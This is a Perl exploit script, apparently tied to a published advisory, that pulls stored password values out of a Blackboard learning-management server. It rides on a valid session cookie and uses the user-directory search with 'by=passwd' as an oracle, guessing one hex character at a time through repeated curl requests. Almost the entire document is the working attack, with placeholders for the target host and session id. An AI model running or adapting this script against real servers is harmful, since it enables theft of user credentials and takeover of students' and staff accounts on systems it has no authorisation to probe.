#!/usr/bin/perl -w

#
# Blackboard Password Extractor
#
# pedram amini <http://pedram.redhive.com>
#
# - refer to the advisory for usage.
# - requires curl.
# - can be easily further automated.
#

# set these:
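# Configuration.  Each value can be overridden from the environment
# (BB_PASSWORD, BB_SESSION_ID, BB_HOST, BB_GREP_FOR) so that a live
# session id never has to be pasted into this file; the literals below are
# only placeholders.  An empty environment value falls back to the literal.
our $password   = $ENV{BB_PASSWORD}   || "abcd";                  # initial known fragment to "narrow down" from.
our $session_id = $ENV{BB_SESSION_ID} || "\@\@123456abcd....";    # current valid session id -- treat it as a credential.
our $host       = $ENV{BB_HOST}       || "blackboard.xxxxx.xxx";  # target blackboard server; interpolated into the URL as-is.
our $grep_for   = $ENV{BB_GREP_FOR}   || "lastname";              # text whose presence in a response marks a hit.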

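# Direction of the walk.  1 extends the known fragment one character at a
# time on the right (working forwards), 0 extends it on the left (working
# backwards).  Both the guess and the update are driven by this one switch,
# so the two can no longer be uncommented inconsistently.
use strict;
use warnings;

our ($password, $session_id, $host, $grep_for);
my $forwards = 1;

# Every unknown position is tried against the sixteen hex digits.
our @chars = ('0' .. '9', 'a' .. 'f');

# _SENTINAL_ is replaced with the current guess for each request.  The URL
# is handed to curl directly (no shell), so the '&' separators need no
# escaping.
our $url = "http://$host/bin/common/search.pl?action=RESULTS&context=USERDIR&type=SEARCH&operation=VIEW&keyword=MEOW&keywordraw=_SENTINAL_&by=passwd";

# Fetch $target_url with the session cookie and return the number of
# response lines containing $grep_for (case-insensitive, literal match).
# curl is started through the list form of open so neither the URL, the
# cookie nor the search term is ever interpreted by a shell.  A transport
# failure is reported on stderr because it would otherwise be
# indistinguishable from "no match" and silently end the search early.
sub count_matches {
    my ($target_url) = @_;

    my @cmd = ('curl', '--silent', '--show-error',
               '--cookie', "session_id=$session_id", $target_url);
    open my $curl, '-|', @cmd or die "cannot run curl: $!";
    my $hits = grep { /\Q$grep_for\E/i } <$curl>;
    close $curl or warn "curl exited with status " . ($? >> 8) . "\n";

    return $hits;
}

my $keep_looking = 1;
while ($keep_looking) {
    $keep_looking = 0;

    for my $ch (@chars) {
        my $cur_pass = $forwards ? $password . $ch : $ch . $password;
        (my $cur_url = $url) =~ s/_SENTINAL_/$cur_pass/;

        print "\n --> working  ... $ch";

        my $hits = count_matches($cur_url);
        print "\n --> returned ... $hits";

        if ($hits) {
            print "\n --> next char found: $ch";
            $password     = $cur_pass;
            $keep_looking = 1;
        }

        # Pace the requests; one second between probes as in the original.
        sleep 1;

        # A hit ends this round; the next round starts from the longer fragment.
        last if $hits;
    }

    print "\n --> current password ... $password";
}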
